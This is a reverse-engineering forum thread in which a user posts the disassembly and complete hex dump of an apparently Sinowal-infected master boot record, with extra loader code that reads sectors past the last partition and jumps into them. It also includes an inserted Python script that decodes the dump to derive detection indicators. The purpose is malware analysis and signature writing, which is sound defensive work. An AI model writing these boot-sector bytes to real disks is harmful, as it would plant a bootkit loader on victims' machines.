A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #11280  by Tigzy
 Thu Jan 26, 2012 8:30 am
Hello

Maybe it will help if I directly provide the code of the MBR ... ?
(still hanging on it...)
Code:
seg000:0000                 xor     ax, ax
seg000:0002                 mov     ds, ax
seg000:0004                 mov     es, ax
seg000:0006                 mov     ss, ax
seg000:0008                 mov     sp, 7C00h
seg000:000B                 mov     si, 7C1Ah
seg000:000E                 mov     di, 600h
seg000:0011                 mov     cx, 1E6h
seg000:0014                 push    ax
seg000:0015                 push    di
seg000:0016                 cld
seg000:0017                 rep movsb
seg000:0019                 retf
seg000:001A ; ---------------------------------------------------------------------------
seg000:001A                 mov     si, 7A4h
seg000:001D                 mov     cl, 4
seg000:001F                 nop
seg000:0020
seg000:0020 loc_20:                                 ; CODE XREF: seg000:002Ej
seg000:0020                 cmp     byte ptr [si], 80h ; 'Ç'
seg000:0023                 jz      short loc_32
seg000:0025                 cmp     [si], ch
seg000:0027                 jnz     loc_E1
seg000:002B                 add     si, 10h
seg000:002E                 loop    loc_20
seg000:0030                 int     18h             ; TRANSFER TO ROM BASIC
seg000:0030                                         ; causes transfer to ROM-based BASIC (IBM-PC)
seg000:0030                                         ; often reboots a compatible; often has no effect at all
seg000:0032
seg000:0032 loc_32:                                 ; CODE XREF: seg000:0023j
seg000:0032                 mov     eax, [si+8]
seg000:0036                 mov     dx, [si]
seg000:0038                 mov     bx, sp
seg000:003A                 mov     cx, 1
seg000:003D                 call    sub_9A
seg000:0040
seg000:0040 loc_40:                                 ; DATA XREF: sub_CF+Dr
seg000:0040                 jnb     short loc_4E
seg000:0042                 mov     cx, [si+2]
seg000:0045                 mov     ax, 201h
seg000:0048                 int     13h             ; DISK - READ SECTORS INTO MEMORY
seg000:0048                                         ; AL = number of sectors to read, CH = track, CL = sector
seg000:0048                                         ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:0048                                         ; Return: CF set on error, AH = status, AL = number of sectors read
seg000:004A                 jb      near ptr loc_FB+1 ; DATA XREF: seg000:0048r
seg000:004A                                         ; sub_9A+9r ...
seg000:004E
seg000:004E loc_4E:                                 ; CODE XREF: seg000:loc_40j
seg000:004E                 mov     ax, 0AA55h
seg000:0051                 sub     ax, ds:7DFEh
seg000:0055                 jnz     near ptr loc_11D+1
seg000:0059                 xor     eax, eax
seg000:005C
seg000:005C loc_5C:                                 ; CODE XREF: seg000:0071j
seg000:005C                 cmp     [si+8], eax
seg000:0060
seg000:0060 loc_60:                                 ; DATA XREF: seg000:0030r
seg000:0060                 jb      short loc_6A
seg000:0062                 mov     eax, [si+8]
seg000:0066                 add     eax, [si+0Ch]
seg000:006A
seg000:006A loc_6A:                                 ; CODE XREF: seg000:loc_60j
seg000:006A                 add     si, 10h
seg000:006D                 cmp     si, 7E4h
seg000:0071                 jb      short loc_5C
seg000:0073                 or      eax, eax
seg000:0076                 jz      short loc_95
seg000:0078                 mov     cx, 9
seg000:007B                 add     bx, 200h
seg000:007F                 call    sub_9A
seg000:0082                 jb      short loc_95
seg000:0084                 mov     si, bx
seg000:0086                 add     bx, 200h
seg000:008A                 cmp     dword ptr [bx], 0B97C00BFh
seg000:0091                 jnz     short loc_95
seg000:0093                 call    bx
seg000:0095
seg000:0095 loc_95:                                 ; CODE XREF: seg000:0076j
seg000:0095                                         ; seg000:0082j ...
seg000:0095                 jmp     far ptr 0:7C00h
seg000:009A
seg000:009A ; =============== S U B R O U T I N E =======================================
seg000:009A
seg000:009A
seg000:009A sub_9A          proc near               ; CODE XREF: seg000:003Dp
seg000:009A                                         ; seg000:007Fp
seg000:009A                 pushad
seg000:009C                 mov     dl, 80h ; 'Ç'
seg000:009E                 mov     bx, 55AAh
seg000:00A1                 mov     ah, 41h ; 'A'
seg000:00A3                 int     13h             ; DISK -
seg000:00A5                 jnb     short loc_AB
seg000:00A7
seg000:00A7 loc_A7:                                 ; CODE XREF: sub_9A+15j
seg000:00A7                                         ; sub_9A+1Aj
seg000:00A7                 stc
seg000:00A8                 popad
seg000:00AA                 retn
seg000:00AB ; ---------------------------------------------------------------------------
seg000:00AB
seg000:00AB loc_AB:                                 ; CODE XREF: sub_9A+Bj
seg000:00AB                 cmp     bx, 0AA55h
seg000:00AF                 jnz     short loc_A7
seg000:00B1                 test    cl, 1
seg000:00B4                 jz      short loc_A7
seg000:00B6                 popad
seg000:00B8                 pushad
seg000:00BA                 push    0
seg000:00BC                 push    0
seg000:00BE                 push    eax
seg000:00C0                 push    es
seg000:00C1                 push    bx
seg000:00C2                 push    cx
seg000:00C3                 push    10h
seg000:00C5                 mov     ah, 42h ; 'B'
seg000:00C7                 mov     si, sp
seg000:00C9                 int     13h             ; DISK -
seg000:00CB                 popa
seg000:00CC                 popad
seg000:00CE                 retn
seg000:00CE sub_9A          endp
seg000:00CE
seg000:00CF
seg000:00CF ; =============== S U B R O U T I N E =======================================
seg000:00CF
seg000:00CF
seg000:00CF sub_CF          proc near               ; CODE XREF: sub_CF+10j
seg000:00CF                                         ; seg000:loc_E1p
seg000:00CF                 pop     si
seg000:00D0                 lodsb
seg000:00D1
seg000:00D1 loc_D1:                                 ; CODE XREF: sub_CF+4j
seg000:00D1                 or      al, al
seg000:00D3                 jz      short loc_D1
seg000:00D5                 push    si
seg000:00D6                 push    ds
seg000:00D7                 mov     bx, 7
seg000:00DA                 mov     ah, 0Eh
seg000:00DC                 int     10h             ; - VIDEO - WRITE CHARACTER AND ADVANCE CURSOR (TTY WRITE)
seg000:00DC                                         ; AL = character, BH = display page (alpha modes)
seg000:00DC                                         ; BL = foreground color (graphics modes)
seg000:00DE                 pop     ds
seg000:00DF                 jmp     short sub_CF
seg000:00DF sub_CF          endp
Raw data:
Code:
seg000:0000  33 C0 8E D8 8E C0 8E D0  BC 00 7C BE 1A 7C BF 00  3+ÄÏÄ+Äð+.|¥|+.
seg000:0010  06 B9 E6 01 50 57 FC F3  A4 CB BE A4 07 B1 04 90  ¦µPW³¾ñ-¥ñ¦É
seg000:0020  80 3C 80 74 0D 38 2C 0F  85 B6 00 83 C6 10 E2 F0  Ç<Çt.8,¤àÂ.âãÔ­
seg000:0030  CD 18 66 8B 44 08 8B 14  8B DC B9 01 00 E8 5A 00  -fïDï¶ï_¦.ÞZ.
seg000:0040  73 0C 8B 4C 02 B8 01 02  CD 13 0F 82 AE 00 B8 55  sïL©-¤é«.©U
seg000:0050  AA 2B 06 FE 7D 0F 85 C5  00 66 33 C0 66 39 44 08  ¬+¦}¤à+.f3+f9D
seg000:0060  72 08 66 8B 44 08 66 03  44 0C 83 C6 10 81 FE E4  rfïDfDâãü¦õ
seg000:0070  07 72 E9 66 0B C0 74 1D  B9 09 00 81 C3 00 02 E8  rÚf+t¦	.ü+.Þ
seg000:0080  18 00 72 11 8B F3 81 C3  00 02 66 81 3F BF 00 7C  .rï¾ü+.fü?+.|
seg000:0090  B9 75 02 FF D3 EA 00 7C  00 00 66 60 B2 80 BB AA  ¦u ËÛ.|..f`¦Ç+¬
seg000:00A0  55 B4 41 CD 13 73 04 F9  66 61 C3 81 FB 55 AA 75  U¦A-s¨fa+ü¹U¬u
seg000:00B0  F6 F6 C1 01 74 F1 66 61  66 60 6A 00 6A 00 66 50  ÷÷-t±faf`j.j.fP
seg000:00C0  06 53 51 6A 10 B4 42 8B  F4 CD 13 61 66 61 C3 5E  SQj¦Bï¶-afa+^
seg000:00D0  AC 0A C0 74 FC 56 1E BB  07 00 B4 0E CD 10 1F EB  ¼.+t³V+.¦-Ù
seg000:00E0  EE E8 EB FF 49 6E 76 61  6C 69 64 20 70 61 72 74  ¯ÞÙ Invalid part
seg000:00F0  69 74 69 6F 6E 20 74 61  62 6C 65 00 E8 D0 FF 45  ition table.Þð E
seg000:0100  72 72 6F 72 20 6C 6F 61  64 69 6E 67 20 6F 70 65  rror loading ope
seg000:0110  72 61 74 69 6E 67 20 73  79 73 74 65 6D 00 E8 AE  rating system.Þ«
seg000:0120  FF 4D 69 73 73 69 6E 67  20 6F 70 65 72 61 74 69   Missing operati
seg000:0130  6E 67 20 73 79 73 74 65  6D 00 00 00 00 00 00 00  ng system.......
seg000:0140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01B0  00 00 00 00 00 2C 4A 7C  CD C2 CD C2 00 00 80 01  .....,J|----..Ç
seg000:01C0  01 00 07 FE BF 08 3F 00  00 00 8A B6 7F 00 00 00  .¦+?...èÂ...
seg000:01D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 55 AA  ..............U¬
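As an added example (not code from the thread or from any of the posters), the script below rebuilds the 512-byte sector from the hex dump above, decodes the partition table and replays the arithmetic at loc_5C..loc_71, so a defender can see which LBA the non-standard code at 0x59..0x93 reads from and what it compares there. The dump rows are copied from the post (hex columns only); the row regex, the function names, the zero-based `Partition` record and the choice of the 7-byte `cmp dword ptr [bx], 0B97C00BFh` encoding as a signature candidate are my own assumptions.

```python
"""Decode the MBR hex dump posted above and analyse its partition table.

Added example, not code from the thread. Only the address and the 16 hex
pairs of each row are read, so rows whose ASCII column was split by the
0x0D / 0x0A bytes (offsets 0x24 and 0xD1) parse exactly like the others.
"""
import hashlib
import re
import struct
from collections import namedtuple

# Hex columns copied from the post; the ASCII column is dropped.
MBR_DUMP = """\
seg000:0000  33 C0 8E D8 8E C0 8E D0  BC 00 7C BE 1A 7C BF 00
seg000:0010  06 B9 E6 01 50 57 FC F3  A4 CB BE A4 07 B1 04 90
seg000:0020  80 3C 80 74 0D 38 2C 0F  85 B6 00 83 C6 10 E2 F0
seg000:0030  CD 18 66 8B 44 08 8B 14  8B DC B9 01 00 E8 5A 00
seg000:0040  73 0C 8B 4C 02 B8 01 02  CD 13 0F 82 AE 00 B8 55
seg000:0050  AA 2B 06 FE 7D 0F 85 C5  00 66 33 C0 66 39 44 08
seg000:0060  72 08 66 8B 44 08 66 03  44 0C 83 C6 10 81 FE E4
seg000:0070  07 72 E9 66 0B C0 74 1D  B9 09 00 81 C3 00 02 E8
seg000:0080  18 00 72 11 8B F3 81 C3  00 02 66 81 3F BF 00 7C
seg000:0090  B9 75 02 FF D3 EA 00 7C  00 00 66 60 B2 80 BB AA
seg000:00A0  55 B4 41 CD 13 73 04 F9  66 61 C3 81 FB 55 AA 75
seg000:00B0  F6 F6 C1 01 74 F1 66 61  66 60 6A 00 6A 00 66 50
seg000:00C0  06 53 51 6A 10 B4 42 8B  F4 CD 13 61 66 61 C3 5E
seg000:00D0  AC 0A C0 74 FC 56 1E BB  07 00 B4 0E CD 10 1F EB
seg000:00E0  EE E8 EB FF 49 6E 76 61  6C 69 64 20 70 61 72 74
seg000:00F0  69 74 69 6F 6E 20 74 61  62 6C 65 00 E8 D0 FF 45
seg000:0100  72 72 6F 72 20 6C 6F 61  64 69 6E 67 20 6F 70 65
seg000:0110  72 61 74 69 6E 67 20 73  79 73 74 65 6D 00 E8 AE
seg000:0120  FF 4D 69 73 73 69 6E 67  20 6F 70 65 72 61 74 69
seg000:0130  6E 67 20 73 79 73 74 65  6D 00 00 00 00 00 00 00
seg000:0140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:0150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:0160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:0170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:0180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:0190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:01A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:01B0  00 00 00 00 00 2C 4A 7C  CD C2 CD C2 00 00 80 01
seg000:01C0  01 00 07 FE BF 08 3F 00  00 00 8A B6 7F 00 00 00
seg000:01D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:01E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
seg000:01F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 55 AA
"""

# One IDA dump row: "seg000:XXXX" followed by exactly 16 hex pairs (assumed format).
ROW = re.compile(r"^seg000:([0-9A-F]{4})\s+((?:[0-9A-F]{2}\s+){15}[0-9A-F]{2})")

# Encoding of "cmp dword ptr [bx], 0B97C00BFh" (seg000:008A), used as a signature candidate.
MARKER_INSN = bytes.fromhex("66813FBF007CB9")

Partition = namedtuple("Partition", "index active ptype start_lba sectors")


def parse_dump(text, size=512):
    """Rebuild the sector from dump rows; fragments of a split ASCII column are skipped."""
    sector = bytearray(size)
    seen = set()
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        off = int(m.group(1), 16)
        sector[off:off + 16] = bytes.fromhex(m.group(2))
        seen.add(off)
    if seen != set(range(0, size, 16)):
        raise ValueError("dump does not cover every 16-byte row")
    return bytes(sector)


def parse_partitions(mbr):
    """Decode the four 16-byte entries at 0x1BE (the CHS fields are not needed here)."""
    parts = []
    for i in range(4):
        e = mbr[0x1BE + 16 * i:0x1BE + 16 * (i + 1)]
        start, count = struct.unpack_from("<II", e, 8)
        parts.append(Partition(i, e[0] == 0x80, e[4], start, count))
    return parts


def loader_target_lba(parts):
    """Replay loc_5C..loc_71: eax = 0; for every entry whose start LBA is not
    below eax (unsigned compare), eax = start + size. The result is the first
    sector past the last partition, from which sub_9A then reads 9 sectors."""
    eax = 0
    for p in parts:
        if p.start_lba >= eax:
            eax = (p.start_lba + p.sectors) & 0xFFFFFFFF
    return eax


def analyse(mbr):
    """Collect the facts a signature writer needs from one decoded sector."""
    parts = parse_partitions(mbr)
    target = loader_target_lba(parts)
    return {
        "boot_signature_ok": mbr[510:512] == b"\x55\xaa",
        "disk_signature": struct.unpack_from("<I", mbr, 0x1B8)[0],
        "active": [p for p in parts if p.active],
        "post_partition_lba": target,
        # the dword compare happens at bx+200h, i.e. on the 2nd of the 9 sectors read
        "marker_check_lba": target + 1,
        "marker_insn_offset": mbr.find(MARKER_INSN),
        "code_sha256": hashlib.sha256(mbr[:0x1B8]).hexdigest(),
    }


MBR = parse_dump(MBR_DUMP)

if __name__ == "__main__":
    for key, value in analyse(MBR).items():
        print(f"{key}: {value}")
```

Running it on the dump above reports a single active NTFS (type 0x07) partition at LBA 63 with 8,369,802 sectors, so the extra code reads from LBA 8,369,865 and performs its dword compare on LBA 8,369,866, the sector right after the partition; dumping those sectors is the natural next check, and the SHA-256 of the code region plus the `cmp` encoding at offset 0x8A are the two static indicators the script exposes.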
 #11284  by EP_X0FF
 Thu Jan 26, 2012 10:49 am
Have you tried debugging?

FYI Sinowal has a few versions, and IIRC this article explains the first version.
As I understand you are trying to create a sort of dynamic signature for this, yes?
 #11291  by Tigzy
 Thu Jan 26, 2012 12:34 pm
Hello EP_X0FF!

No, I didn't try to debug; this is a bit more complicated than getting a dump and pushing it into IDA :cry:
I thought I could understand what this bootstrap does, but I don't.

The article I found seems to not be the one I got.
Yes, a signature is my aim. But for the moment, I only need some help to understand the code.
 #11292  by EP_X0FF
 Thu Jan 26, 2012 12:46 pm
You can use bochs + IDA Pro for live debugging of mbr.

Bochs is an open emulator, and IDA 6 became "ESET gift freeware" last year.

Additionally you will need Python support and the special package required for MBR debugging; you can get it here.

http://hexblog.com/ida_pro/files/mbr_bochs.zip

As I remember Sinowal was using sort of mbr code morphing by adding garbage.
 #11294  by Tigzy
 Thu Jan 26, 2012 1:25 pm
Yes, but to debug the MBR it will need to be installed on the physical drive, right?
I can't debug from a dump file?

Just by looking at the code, don't you see anything suspicious that could help me?
I compared it with the standard MBR and found that loc_6A was not in the standard code...
 #11295  by EP_X0FF
 Thu Jan 26, 2012 1:31 pm
Tigzy wrote: Yes, but to debug the MBR it will need to be installed on the physical drive, right?
Guess why you need bochs. To debug the MBR through its image. See readme.txt in the package.